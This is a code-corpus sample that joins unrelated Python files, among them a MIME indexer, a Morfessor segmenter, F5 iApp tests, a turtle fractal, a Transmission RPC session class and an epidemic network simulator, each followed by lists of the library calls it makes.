pop = Popen(['file','-b','--mime',fname], shell=False, stdout=PIPE)
(result, _) = pop.communicate()
mime2 = result.split(';')[0]
_logger.debug('File gives us: %s', mime2)
# Note that the temporary file still exists now.
mime,fobj = mime_match(mime2, self.mimes)
if not mime:
mime = mime2
except Exception:
_logger.exception('Cannot determine mime type.')
try:
if fobj:
res = (mime, fobj.indexContent(content,filename,fname or realfname) )
else:
_logger.debug("Have no object, return (%s, None).", mime)
res = (mime, '')
except Exception:
_logger.exception("Cannot index file %s (%s).",
filename, fname or realfname)
res = (mime, '')
# If we created a tmp file, unlink it now
if not realfname and fname:
try:
os.unlink(fname)
except Exception:
_logger.exception("Cannot unlink %s.", fname)
return res
cntIndex = contentIndex()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"subprocess.Popen",
"os.unlink",
"tempfile.mkstemp",
"os.close",
"os.path.splitext",
"os.write",
"logging.getLogger"
] | [((1064, 1091), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1081, 1091), False, 'import logging\n'), ((2877, 2905), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': 'ext'}), '(suffix=ext)\n', (2893, 2905), False, 'import tempfile\n'), ((2922, 2943), 'os.write', 'os.write', (['fd', 'content'], {}), '(fd, content)\n', (2930, 2943), False, 'import os\n'), ((2960, 2972), 'os.close', 'os.close', (['fd'], {}), '(fd)\n', (2968, 2972), False, 'import os\n'), ((3037, 3054), 'os.unlink', 'os.unlink', (['rfname'], {}), '(rfname)\n', (3046, 3054), False, 'import os\n'), ((4625, 4651), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (4641, 4651), False, 'import os\n'), ((5356, 5420), 'subprocess.Popen', 'Popen', (["['file', '-b', '--mime', fname]"], {'shell': '(False)', 'stdout': 'PIPE'}), "(['file', '-b', '--mime', fname], shell=False, stdout=PIPE)\n", (5361, 5420), False, 'from subprocess import Popen, PIPE\n'), ((6397, 6413), 'os.unlink', 'os.unlink', (['fname'], {}), '(fname)\n', (6406, 6413), False, 'import os\n'), ((5229, 5257), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': 'ext'}), '(suffix=ext)\n', (5245, 5257), False, 'import tempfile\n'), ((5278, 5299), 'os.write', 'os.write', (['fd', 'content'], {}), '(fd, content)\n', (5286, 5299), False, 'import os\n'), ((5320, 5332), 'os.close', 'os.close', (['fd'], {}), '(fd)\n', (5328, 5332), False, 'import os\n'), ((2810, 2836), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (2826, 2836), False, 'import os\n'), ((5065, 5105), 'os.path.splitext', 'os.path.splitext', (["(filename or 'test.tmp')"], {}), "(filename or 'test.tmp')\n", (5081, 5105), False, 'import os\n')] |
#!/usr/bin/env python3
from __future__ import print_function
import morfessor
import sys
import logging
import lzma
import os
import math
def main(allowed_chars_file, model):
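    # read the allowed single-character set and the trained model, then segment each word read from stdin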
allowed_chars = {line.strip() for line in open(allowed_chars_file, encoding='utf-8') if len(line.strip()) == 1}
model = morfessor.MorfessorIO().read_any_model(model)
for line in sys.stdin:
word = line.strip()
parts = model.viterbi_segment(word)[0]
print(word,end=' ')
print(" ".join(parts).replace("<unk>", "<UNK>"))
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
if len(sys.argv) != 3:
print("usage: python3 create_morf_wordmap.py <allowe-characters-file> <morfessor-model> < word-list")
print("e.g.: python3 create_morf_wordmap.py data/kws_prep/allowed_chars data/kws_prep/morf/model.bin < data/kws_prep/dev.words")
print("This script prints a stdout word and its morpheme constituents according to the morfessor.")
sys.exit(-1)
main(sys.argv[1],sys.argv[2])
| [
"morfessor.MorfessorIO",
"sys.exit",
"logging.basicConfig"
] | [((575, 614), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (594, 614), False, 'import logging\n'), ((1005, 1017), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (1013, 1017), False, 'import sys\n'), ((309, 332), 'morfessor.MorfessorIO', 'morfessor.MorfessorIO', ([], {}), '()\n', (330, 332), False, 'import morfessor\n')] |
from __future__ import print_function
from create_tree import *
import numpy as np
import random
DATA_DIR = "../data/"
def curriculum_depth(i, num_examples, max_depth):
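    # curriculum: the admissible random tree depth grows with the example index i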
curriculum_max_depth= int((max_depth*i)/num_examples)
#print(i, curriculum_max_depth,)
if curriculum_max_depth > 0:
random_depth = 2 + np.random.randint(curriculum_max_depth)
else:
random_depth = 2
#print("DEPTH = ", random_depth)
return random_depth
def copy_t2t(depth):
my_tree = generate_data(depth-1)
change_nts(my_tree)
my_list = convert_to_list_inorder(my_tree,[])
infix_tree = ' '.join(str(e) for e in my_list)
#print my_tree
return ([infix_tree, infix_tree])
def create_examples(num_examples, max_depth, function):
data = []
for i in range(num_examples):
depth = max_depth
if np.random.randint(2) == 0:
depth = curriculum_depth(i, num_examples, max_depth)
data.append(function(depth))
return data
if __name__ == "__main__":
num_examples = 1000
max_depth = 5
data_subset = "train"
t2t_operation = "COPY"
seed = 0
#NOTE: we need both -- for reproducible trees...
#numpy.random.seed(seed)
#random.seed(seed)
if t2t_operation == "COPY":
data = create_examples(num_examples,max_depth, function=copy_t2t)
trans = open(DATA_DIR + data_subset + '.copy', 'w')
elif t2t_operation == "RELABEL_1":
data = create_examples(num_examples,max_depth, function=copy_t2t)
trans = open(DATA_DIR + data_subset + '.copy', 'w')
orig = open(DATA_DIR + data_subset + '.orig', 'w')
for i in range(num_examples):
print(data[i][0], file=orig)
print(data[i][1], file=trans)
#orig_vocab = open(DATA_DIR + 'vocab.train.orig', 'w')
#trans_vocab = open(DATA_DIR + 'vocab.train.copy', 'w')
#max_num = 256
#operators = ['+','-','*','/']
#for i in range(1, max_num+1):
# print >> orig_vocab, i, i
# print >> trans_vocab, i, i
#for i in range(len(operators)):
# print >> orig_vocab, operators[i], max_num+i+1
# print >> trans_vocab, operators[i], max_num+i+1
#print >> orig_vocab, '(', max_num + len(operators) + 1
#print >> orig_vocab, ')', max_num + len(operators) + 2
#print >> trans_vocab, '(', max_num + len(operators) + 1
#print >> trans_vocab, ')', max_num + len(operators) + 2
| [
"numpy.random.randint"
] | [((326, 365), 'numpy.random.randint', 'np.random.randint', (['curriculum_max_depth'], {}), '(curriculum_max_depth)\n', (343, 365), True, 'import numpy as np\n'), ((857, 877), 'numpy.random.randint', 'np.random.randint', (['(2)'], {}), '(2)\n', (874, 877), True, 'import numpy as np\n')] |
# Copyright 2015 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from distutils.version import LooseVersion
from requests.exceptions import HTTPError
pytestmark = pytest.mark.skipif(
LooseVersion(pytest.config.getoption('--release'))
< LooseVersion('12.0.0'),
reason='Needs v12 TMOS or greater to pass.'
)
@pytest.fixture(scope='function')
def iapp_lx(mgmt_root):
fake_iapp_name = 'foo-iapp.rpm'
sio = StringIO(80*'a')
ftu = mgmt_root.shared.file_transfer.uploads
ftu.upload_stringio(sio, fake_iapp_name, chunk_size=20)
yield fake_iapp_name
tpath_name = '/var/config/rest/downloads/{0}'.format(fake_iapp_name)
mgmt_root.tm.util.unix_rm.exec_cmd('run', utilCmdArgs=tpath_name)
@pytest.fixture(scope='function')
def pkg_task(mgmt_root, iapp_lx):
collection = mgmt_root.shared.iapp.package_management_tasks_s
task = collection.package_management_task.create(
operation='INSTALL',
packageFilePath='/var/config/rest/downloads/foo-iapp.rpm'
)
yield task
@pytest.fixture(scope='function')
def pkg_query_task(mgmt_root, iapp_lx):
collection = mgmt_root.shared.iapp.package_management_tasks_s
task = collection.package_management_task.create(
operation='QUERY'
)
yield task
class TestPackageManagementTasks(object):
def test_create_task(self, pkg_task):
assert pkg_task.operation == "INSTALL"
assert pkg_task.kind == \
'shared:iapp:package-management-tasks:iapppackagemanagementtaskstate' # NOQA
def test_load_no_task(self, mgmt_root):
with pytest.raises(HTTPError) as err:
collection = mgmt_root.shared.iapp.package_management_tasks_s
collection.package_management_task.load(
id='asdasdasd'
)
assert err.value.response.status_code == 404
def test_load(self, mgmt_root, pkg_task):
collection = mgmt_root.shared.iapp.package_management_tasks_s
resource = collection.package_management_task.load(id=pkg_task.id)
assert pkg_task.id == resource.id
assert pkg_task.selfLink == resource.selfLink
def test_exists(self, mgmt_root, pkg_task):
pid = str(pkg_task.id)
collection = mgmt_root.shared.iapp.package_management_tasks_s
exists = collection.package_management_task.exists(id=pid)
assert exists is True
def test_cancel(self, pkg_task):
pkg_task.cancel()
assert pkg_task.__dict__['canceled']
def test_delete(self, pkg_task):
pkg_task.cancel()
while True:
pkg_task.refresh()
if pkg_task.status in ['CANCELED', 'FAILED', 'FINISHED']:
pkg_task.delete()
break
assert pkg_task.__dict__['deleted']
def test_package_mgmt_tasks_collection(self, mgmt_root, iapp_lx):
col = mgmt_root.shared.iapp.package_management_tasks_s.get_collection()
assert isinstance(col, list)
assert len(col) > 0
def test_create_query_task(self, pkg_query_task):
assert pkg_query_task.operation == "QUERY"
assert pkg_query_task.kind == \
'shared:iapp:package-management-tasks:iapppackagemanagementtaskstate' # NOQA
| [
"io.StringIO",
"pytest.config.getoption",
"distutils.version.LooseVersion",
"pytest.fixture",
"pytest.raises"
] | [((943, 975), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""'}), "(scope='function')\n", (957, 975), False, 'import pytest\n'), ((1343, 1375), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""'}), "(scope='function')\n", (1357, 1375), False, 'import pytest\n'), ((1649, 1681), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""'}), "(scope='function')\n", (1663, 1681), False, 'import pytest\n'), ((1046, 1064), 'io.StringIO', 'StringIO', (["(80 * 'a')"], {}), "(80 * 'a')\n", (1054, 1064), False, 'from io import StringIO\n'), ((866, 888), 'distutils.version.LooseVersion', 'LooseVersion', (['"""12.0.0"""'], {}), "('12.0.0')\n", (878, 888), False, 'from distutils.version import LooseVersion\n'), ((822, 858), 'pytest.config.getoption', 'pytest.config.getoption', (['"""--release"""'], {}), "('--release')\n", (845, 858), False, 'import pytest\n'), ((2204, 2228), 'pytest.raises', 'pytest.raises', (['HTTPError'], {}), '(HTTPError)\n', (2217, 2228), False, 'import pytest\n')] |
"""
    Purpose: fractal tree
    Version: 1.0
    Date: 2018/08/19
"""
import turtle
def draw_branch(branch_length, pen_size):
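    # recursively draw one branch and its two sub-branches, each 10 units shorter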
if(branch_length > 0):
turtle.forward(branch_length)
turtle.right(20)
draw_branch(branch_length-10, pen_size)
turtle.left(40)
draw_branch(branch_length-10, pen_size)
turtle.right(20)
turtle.backward(branch_length)
def main():
    # move the pen to its starting position
turtle.right(90)
turtle.penup()
turtle.forward(300)
turtle.pendown()
turtle.left(90)
turtle.left(90)
draw_branch(100, 5)
turtle.exitonclick()
if __name__ == '__main__':
main()
| [
"turtle.backward",
"turtle.forward",
"turtle.exitonclick",
"turtle.right",
"turtle.penup",
"turtle.left",
"turtle.pendown"
] | [((415, 431), 'turtle.right', 'turtle.right', (['(90)'], {}), '(90)\n', (427, 431), False, 'import turtle\n'), ((436, 450), 'turtle.penup', 'turtle.penup', ([], {}), '()\n', (448, 450), False, 'import turtle\n'), ((455, 474), 'turtle.forward', 'turtle.forward', (['(300)'], {}), '(300)\n', (469, 474), False, 'import turtle\n'), ((479, 495), 'turtle.pendown', 'turtle.pendown', ([], {}), '()\n', (493, 495), False, 'import turtle\n'), ((500, 515), 'turtle.left', 'turtle.left', (['(90)'], {}), '(90)\n', (511, 515), False, 'import turtle\n'), ((521, 536), 'turtle.left', 'turtle.left', (['(90)'], {}), '(90)\n', (532, 536), False, 'import turtle\n'), ((565, 585), 'turtle.exitonclick', 'turtle.exitonclick', ([], {}), '()\n', (583, 585), False, 'import turtle\n'), ((142, 171), 'turtle.forward', 'turtle.forward', (['branch_length'], {}), '(branch_length)\n', (156, 171), False, 'import turtle\n'), ((180, 196), 'turtle.right', 'turtle.right', (['(20)'], {}), '(20)\n', (192, 196), False, 'import turtle\n'), ((254, 269), 'turtle.left', 'turtle.left', (['(40)'], {}), '(40)\n', (265, 269), False, 'import turtle\n'), ((327, 343), 'turtle.right', 'turtle.right', (['(20)'], {}), '(20)\n', (339, 343), False, 'import turtle\n'), ((352, 382), 'turtle.backward', 'turtle.backward', (['branch_length'], {}), '(branch_length)\n', (367, 382), False, 'import turtle\n')] |
# Generated by Django 2.1.4 on 2019-04-26 07:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0014_auto_20190417_1639'),
]
operations = [
migrations.AlterUniqueTogether(
name='documentpart',
unique_together={('order', 'document')},
),
]
| [
"django.db.migrations.AlterUniqueTogether"
] | [((224, 321), 'django.db.migrations.AlterUniqueTogether', 'migrations.AlterUniqueTogether', ([], {'name': '"""documentpart"""', 'unique_together': "{('order', 'document')}"}), "(name='documentpart', unique_together={(\n 'order', 'document')})\n", (254, 321), False, 'from django.db import migrations\n')] |
# Generated by Django 2.2.13 on 2021-07-22 14:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('des', '0032_auto_20210713_2127'),
]
operations = [
migrations.AlterField(
model_name='astrometryjob',
name='status',
field=models.IntegerField(choices=[(1, 'Idle'), (2, 'Running'), (3, 'Completed'), (4, 'Failed'), (5, 'Aborted'), (6, 'Warning'), (7, 'Launched')], default=1, verbose_name='Status'),
),
]
| [
"django.db.models.IntegerField"
] | [((340, 522), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'choices': "[(1, 'Idle'), (2, 'Running'), (3, 'Completed'), (4, 'Failed'), (5,\n 'Aborted'), (6, 'Warning'), (7, 'Launched')]", 'default': '(1)', 'verbose_name': '"""Status"""'}), "(choices=[(1, 'Idle'), (2, 'Running'), (3, 'Completed'),\n (4, 'Failed'), (5, 'Aborted'), (6, 'Warning'), (7, 'Launched')],\n default=1, verbose_name='Status')\n", (359, 522), False, 'from django.db import migrations, models\n')] |
import pytest
from pyformlang.finite_automaton import NondeterministicFiniteAutomaton
from project import BooleanMatrices
@pytest.fixture
def nfa():
nfa = NondeterministicFiniteAutomaton()
nfa.add_transitions(
[
(0, "X", 1),
(0, "X", 2),
(1, "Y", 2),
(1, "Z", 1),
(2, "S", 3),
(3, "W", 4),
(4, "W", 0),
]
)
return nfa
@pytest.mark.parametrize(
"label,expected_nnz", [("X", 2), ("Y", 1), ("Z", 1), ("S", 1), ("W", 2)]
)
def test_nonzero(nfa, label, expected_nnz):
bm = BooleanMatrices(nfa)
actual_nnz = bm.bool_matrices[label].nnz
assert actual_nnz == expected_nnz
def test_symbols(nfa):
bm = BooleanMatrices(nfa)
actual_symbols = bm.bool_matrices.keys()
expected_symbols = nfa.symbols
assert actual_symbols == expected_symbols
@pytest.mark.parametrize(
"label,edges",
[
("X", [(0, 1), (0, 2)]),
("Y", [(1, 2)]),
("Z", [(1, 1)]),
("S", [(2, 3)]),
("W", [(3, 4), (4, 0)]),
],
)
def test_adjacency(nfa, label, edges):
bm = BooleanMatrices(nfa)
assert all(bm.bool_matrices[label][edge] for edge in edges)
def test_transitive_closure(nfa):
bm = BooleanMatrices(nfa)
tc = bm.make_transitive_closure()
assert tc.sum() == tc.size
| [
"pyformlang.finite_automaton.NondeterministicFiniteAutomaton",
"pytest.mark.parametrize",
"project.BooleanMatrices"
] | [((441, 542), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""label,expected_nnz"""', "[('X', 2), ('Y', 1), ('Z', 1), ('S', 1), ('W', 2)]"], {}), "('label,expected_nnz', [('X', 2), ('Y', 1), ('Z', 1),\n ('S', 1), ('W', 2)])\n", (464, 542), False, 'import pytest\n'), ((888, 1033), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""label,edges"""', "[('X', [(0, 1), (0, 2)]), ('Y', [(1, 2)]), ('Z', [(1, 1)]), ('S', [(2, 3)]),\n ('W', [(3, 4), (4, 0)])]"], {}), "('label,edges', [('X', [(0, 1), (0, 2)]), ('Y', [(1,\n 2)]), ('Z', [(1, 1)]), ('S', [(2, 3)]), ('W', [(3, 4), (4, 0)])])\n", (911, 1033), False, 'import pytest\n'), ((162, 195), 'pyformlang.finite_automaton.NondeterministicFiniteAutomaton', 'NondeterministicFiniteAutomaton', ([], {}), '()\n', (193, 195), False, 'from pyformlang.finite_automaton import NondeterministicFiniteAutomaton\n'), ((598, 618), 'project.BooleanMatrices', 'BooleanMatrices', (['nfa'], {}), '(nfa)\n', (613, 618), False, 'from project import BooleanMatrices\n'), ((737, 757), 'project.BooleanMatrices', 'BooleanMatrices', (['nfa'], {}), '(nfa)\n', (752, 757), False, 'from project import BooleanMatrices\n'), ((1136, 1156), 'project.BooleanMatrices', 'BooleanMatrices', (['nfa'], {}), '(nfa)\n', (1151, 1156), False, 'from project import BooleanMatrices\n'), ((1266, 1286), 'project.BooleanMatrices', 'BooleanMatrices', (['nfa'], {}), '(nfa)\n', (1281, 1286), False, 'from project import BooleanMatrices\n')] |
# -*- coding: utf-8 -*-
from scripts import tabledef
from flask import session
from sqlalchemy.orm import sessionmaker
from contextlib import contextmanager
import bcrypt
import sys, subprocess, ipaddress, time, datetime, json, os, csv, copy
from watson_developer_cloud import DiscoveryV1
EnvID="5aec3469-82f9-49cb-9718-e3d0526a85f7"
ColID="ccc5a579-296d-445f-a4cf-9fd81c536e8d"
ConfID="e813ec51-af96-422f-943c-65d776818292"
@contextmanager
def session_scope():
"""Provide a transactional scope around a series of operations."""
s = get_session()
s.expire_on_commit = False
try:
yield s
s.commit()
except:
s.rollback()
raise
finally:
s.close()
def get_session():
return sessionmaker(bind=tabledef.engine)()
def get_natural_language_query(query):
#with session_scope() as s:
    print("query is " + query)
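    # query the Discovery collection and keep only the single best-scoring passage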
discovery = DiscoveryV1(version='2018-03-05', username="9e523dc4-1206-4898-a30f-faf75cd8526b", password="<PASSWORD>")
my_query = discovery.query(environment_id=EnvID, collection_id=ColID, query=query, passages='true', passages_count='1', count=1, highlight='true')
p_passage=my_query['passages'][0]["passage_text"]
p_score=my_query['passages'][0]["passage_score"]
p_id=my_query['passages'][0]["document_id"]
querylist = [p_passage,p_score,p_id]
return querylist
| [
"sqlalchemy.orm.sessionmaker",
"watson_developer_cloud.DiscoveryV1"
] | [((911, 1021), 'watson_developer_cloud.DiscoveryV1', 'DiscoveryV1', ([], {'version': '"""2018-03-05"""', 'username': '"""9e523dc4-1206-4898-a30f-faf75cd8526b"""', 'password': '"""<PASSWORD>"""'}), "(version='2018-03-05', username=\n '9e523dc4-1206-4898-a30f-faf75cd8526b', password='<PASSWORD>')\n", (922, 1021), False, 'from watson_developer_cloud import DiscoveryV1\n'), ((745, 779), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'tabledef.engine'}), '(bind=tabledef.engine)\n', (757, 779), False, 'from sqlalchemy.orm import sessionmaker\n')] |
# -*- coding: utf-8 -*-
from celery.task import task
@task
def publish_recipe(recipe):
from recipes.models import Recipe
try:
recipe = Recipe.objects.get(id=recipe.id)
recipe.published=True
recipe.save()
except Recipe.DoesNotExist:
pass | [
"recipes.models.Recipe.objects.get"
] | [((141, 173), 'recipes.models.Recipe.objects.get', 'Recipe.objects.get', ([], {'id': 'recipe.id'}), '(id=recipe.id)\n', (159, 173), False, 'from recipes.models import Recipe\n')] |
# Copyright (c) 2018-2021 Trim21 <<EMAIL>>
# Copyright (c) 2008-2014 <NAME> <<EMAIL>>
# Licensed under the MIT license.
from typing import TYPE_CHECKING, Any, Dict, Tuple, Union, Generator
from typing_extensions import Literal
from transmission_rpc.lib_types import Field
if TYPE_CHECKING:
from transmission_rpc.client import Client
class Session:
"""
Session is a dict-like class holding the session data for a Transmission daemon.
Access the session field can be done through attributes.
The attributes available are the same as the session arguments in the
Transmission RPC specification, but with underscore instead of hyphen.
get ``'download-dir'`` with ``session.download_dir``.
.. code-block:: python
session = Client().get_session()
current = session.download_dir
there are also setter like ``Session().download_dir = '/path/to/download'``
.. code-block:: python
session = Client().get_session()
session.download_dir = '/path/to/new/download/dir'
if you want to batch update a session, call ``.update(data)``
.. code-block:: python
session = Client().get_session()
session.update({'k1': 'v1', "k2": "v2"})
if you have to access to the private ``Session()._fields``,
keys are stored with underscore.
"""
def __init__(self, client: "Client", fields: Dict[str, Any] = None):
self._client = client
self._fields: Dict[str, Field] = {}
if fields is not None:
self._update(fields)
def __getattr__(self, name: str) -> Any:
try:
return self._fields[name].value
except KeyError as e:
raise AttributeError(f"No attribute {name}") from e
def _set(self, key: str, value: Any, commit: bool = False) -> None:
key = key.replace("-", "_")
current_field = self._fields.get(key)
if current_field is None:
self._fields[key] = Field(value, True)
else:
if current_field.value != value:
self._fields[key] = Field(value, True)
if commit:
self._commit(key, value)
def __str__(self) -> str:
text = ""
max_length = max(len(x) for x in self._fields.keys()) + 1
for key, value in sorted(self._fields.items(), key=lambda x: x[0]):
text += f"{key.ljust(max_length)}: {value.value!r}\n"
return text
def _commit(self, key: str = None, value: Any = None) -> None:
"""submit all dirty field to client"""
dirty = {}
if key is not None and value is not None:
dirty[key] = value
else:
for k, v in self._fields.items():
if v.dirty:
dirty[k] = v.value
self._client.set_session(**dirty)
def _update(self, other: Union[Dict[str, Any], "Session"]) -> None:
if isinstance(other, dict):
for key, value in other.items():
self._set(key, value)
elif isinstance(other, Session):
for key, value in other._fields.items():
self._set(key, value.value)
else:
raise ValueError("Cannot update with supplied data")
def update(self, other: Union[Dict[str, Any], "Session"]) -> None:
"""
Update the session data from a Transmission JSON-RPC arguments dictionary
"""
self._update(other)
self._commit()
def keys(self) -> Generator[str, None, None]:
"""
session keys with underscore (eg: ``download_dir``)
"""
yield from self._fields.keys()
def values(self) -> Generator[Any, None, None]:
for value in self._fields.values():
yield value.value
def items(self) -> Generator[Tuple[str, Any], None, None]:
"""
iter key,value pair
hyphen in key is replace by underscore. (eg: ``'download_dir'``)
"""
for key, field in self._fields.items():
yield key, field.value
@property
def download_dir(self) -> str:
"""default download location
- rpc version 12
- transmission version 2.20
:return:
"""
return self.__getattr__("download_dir")
@download_dir.setter
def download_dir(self, location: str) -> None:
"""Enable/disable peer exchange."""
if isinstance(location, str) and location:
self._set("download_dir", location, True)
else:
raise TypeError(f"{location!r} if not a valid 'download-dir'")
@property
def version(self) -> str:
"""
- rpc version 3
- transmission version 1.41
"""
return self.__getattr__("version")
@property
def rpc_version(self) -> int:
"""
- rpc version 4
- transmission version 1.50
"""
return self.__getattr__("rpc_version")
@property
def peer_port(self) -> int:
"""Get the peer port.
- rpc version 5
- transmission version 1.60
"""
return self.__getattr__("peer_port")
@peer_port.setter
def peer_port(self, port: int) -> None:
"""Set the peer port.
- rpc version 5
- transmission version 1.60
"""
if isinstance(port, int):
self._set("peer_port", port, True)
else:
raise ValueError("Not a valid limit")
@property
def pex_enabled(self) -> bool:
"""Is peer exchange enabled
- rpc version 5
- transmission version 1.60"""
return self.__getattr__("pex_enabled")
@pex_enabled.setter
def pex_enabled(self, enabled: bool) -> None:
"""Enable/disable peer exchange."""
if isinstance(enabled, bool):
self._set("pex_enabled", enabled, True)
else:
raise TypeError("Not a valid type")
@property
def encryption(self) -> str:
return self.__getattr__("encryption")
@encryption.setter
def encryption(self, value: Literal["required", "preferred", "tolerated"]) -> None:
if value in {"required", "preferred", "tolerated"}:
self._set("encryption", value, commit=True)
else:
raise ValueError(
"Not a valid encryption, can only be one of ['required', 'preferred', 'tolerated']"
)
| [
"transmission_rpc.lib_types.Field"
] | [((1972, 1990), 'transmission_rpc.lib_types.Field', 'Field', (['value', '(True)'], {}), '(value, True)\n', (1977, 1990), False, 'from transmission_rpc.lib_types import Field\n'), ((2086, 2104), 'transmission_rpc.lib_types.Field', 'Field', (['value', '(True)'], {}), '(value, True)\n', (2091, 2104), False, 'from transmission_rpc.lib_types import Field\n')] |
from decimal import Decimal as D
from django.test import TestCase
from nose.plugins.attrib import attr
import mock
from oscar.apps.shipping import methods
from oscar.apps.shipping.models import OrderAndItemCharges
@attr('shipping')
class TestStandardMethods(TestCase):
def setUp(self):
self.non_discount_methods = [
methods.Free(),
methods.FixedPrice(D('10.00'), D('10.00')),
OrderAndItemCharges(price_per_order=D('5.00'),
price_per_item=D('1.00'))]
def test_have_is_discounted_property(self):
for method in self.non_discount_methods:
self.assertFalse(method.is_discounted)
class TestDiscountingMethodsWithoutTax(TestCase):
def setUp(self):
self.base_method = methods.FixedPrice(D('10.00'))
offer = mock.Mock()
offer.shipping_discount = mock.Mock(
return_value=D('5.00'))
self.method = methods.TaxExclusiveOfferDiscount(
self.base_method, offer)
def test_delegates_properties_onto_wrapped_method(self):
self.assertFalse(self.method.is_tax_known)
self.assertEqual(
self.method.charge_excl_tax_before_discount, D('10.00'))
self.assertEqual(self.method.code, self.base_method.code)
self.assertEqual(self.method.name, self.base_method.name)
self.assertEqual(self.method.description,
self.base_method.description)
def test_discounts_charge(self):
self.assertEqual(self.method.charge_excl_tax, D('5.00'))
def test_correctly_sets_tax(self):
self.method.tax = D('2.00')
self.assertTrue(self.method.is_tax_known)
self.assertEqual(self.method.charge_incl_tax, D('7.00'))
| [
"decimal.Decimal",
"oscar.apps.shipping.methods.TaxExclusiveOfferDiscount",
"mock.Mock",
"oscar.apps.shipping.methods.Free",
"nose.plugins.attrib.attr"
] | [((219, 235), 'nose.plugins.attrib.attr', 'attr', (['"""shipping"""'], {}), "('shipping')\n", (223, 235), False, 'from nose.plugins.attrib import attr\n'), ((832, 843), 'mock.Mock', 'mock.Mock', ([], {}), '()\n', (841, 843), False, 'import mock\n'), ((947, 1005), 'oscar.apps.shipping.methods.TaxExclusiveOfferDiscount', 'methods.TaxExclusiveOfferDiscount', (['self.base_method', 'offer'], {}), '(self.base_method, offer)\n', (980, 1005), False, 'from oscar.apps.shipping import methods\n'), ((1633, 1642), 'decimal.Decimal', 'D', (['"""2.00"""'], {}), "('2.00')\n", (1634, 1642), True, 'from decimal import Decimal as D\n'), ((345, 359), 'oscar.apps.shipping.methods.Free', 'methods.Free', ([], {}), '()\n', (357, 359), False, 'from oscar.apps.shipping import methods\n'), ((804, 814), 'decimal.Decimal', 'D', (['"""10.00"""'], {}), "('10.00')\n", (805, 814), True, 'from decimal import Decimal as D\n'), ((1215, 1225), 'decimal.Decimal', 'D', (['"""10.00"""'], {}), "('10.00')\n", (1216, 1225), True, 'from decimal import Decimal as D\n'), ((1556, 1565), 'decimal.Decimal', 'D', (['"""5.00"""'], {}), "('5.00')\n", (1557, 1565), True, 'from decimal import Decimal as D\n'), ((1747, 1756), 'decimal.Decimal', 'D', (['"""7.00"""'], {}), "('7.00')\n", (1748, 1756), True, 'from decimal import Decimal as D\n'), ((392, 402), 'decimal.Decimal', 'D', (['"""10.00"""'], {}), "('10.00')\n", (393, 402), True, 'from decimal import Decimal as D\n'), ((404, 414), 'decimal.Decimal', 'D', (['"""10.00"""'], {}), "('10.00')\n", (405, 414), True, 'from decimal import Decimal as D\n'), ((914, 923), 'decimal.Decimal', 'D', (['"""5.00"""'], {}), "('5.00')\n", (915, 923), True, 'from decimal import Decimal as D\n'), ((465, 474), 'decimal.Decimal', 'D', (['"""5.00"""'], {}), "('5.00')\n", (466, 474), True, 'from decimal import Decimal as D\n'), ((523, 532), 'decimal.Decimal', 'D', (['"""1.00"""'], {}), "('1.00')\n", (524, 532), True, 'from decimal import Decimal as D\n')] |
# Network
import numpy as np
import pandas as pd
import simulator
import random
from igraph import *
import matplotlib.pyplot as plt
class Network():
"""docstring for Network"""
def __init__(self, simulator):
		# Generate a random graph
self.g = Graph.Erdos_Renyi(simulator.num_nodi,simulator.p_link)
		# Initialise the time-step and epidemic-state vectors
self.t_state = np.zeros((simulator.num_nodi,1))
self.e_state = np.zeros((simulator.num_nodi,1),dtype=np.int8)
		# random initial assignment of the exposed nodes
np.put(self.e_state,np.random.choice(range(simulator.num_nodi*1), simulator.exp0, replace=False),1)
		self.states = {} # Dictionary of the current states
		self.data = pd.DataFrame(columns=["index","days","exposed","infected","severe infected","recovered","dead","susceptible","total"]) # Table of per-step state counts
	def update_states(self,i,simulator): # Update the epidemic states
		"""State encoding:
- Susceptible = 0
- Exposed = 1
- Infected = 2
- Severe Infected = 3
- Recovered = 4
- Dead = 5
"""
		# Copy the epidemic states from the state arrays into the dictionary
self.states = { 'exposed':np.where(np.copy(self.e_state)==1,self.e_state,0),
'infected':np.where(np.copy(self.e_state)==2,self.e_state,0),
'recovered':np.where(np.copy(self.e_state)==4,self.e_state,0),
'severe_infected':np.where(np.copy(self.e_state)==3,self.e_state,0),
'dead':np.where(np.copy(self.e_state)==5,self.e_state,0),
'susceptible':(simulator.num_nodi - np.count_nonzero(np.copy(self.e_state))),
'total_cases':np.count_nonzero(np.copy(self.e_state)) }
		# Append the count of each epidemic state to the dataframe
self.data.loc[i,:] = [i, i*simulator.dt_state,np.count_nonzero(self.states['exposed']), np.count_nonzero(self.states['infected']),
np.count_nonzero(self.states['severe_infected']), np.count_nonzero(self.states['recovered']),
np.count_nonzero(self.states['dead']), self.states['susceptible'], self.states['total_cases']]
#print(self.data)
	def plot(self,i,simulator): # Build the plots
plt.clf()
ax = plt.gca()
self.data.plot(x = 'days', y = 'susceptible', kind = 'line', color = 'cyan', ax = ax)
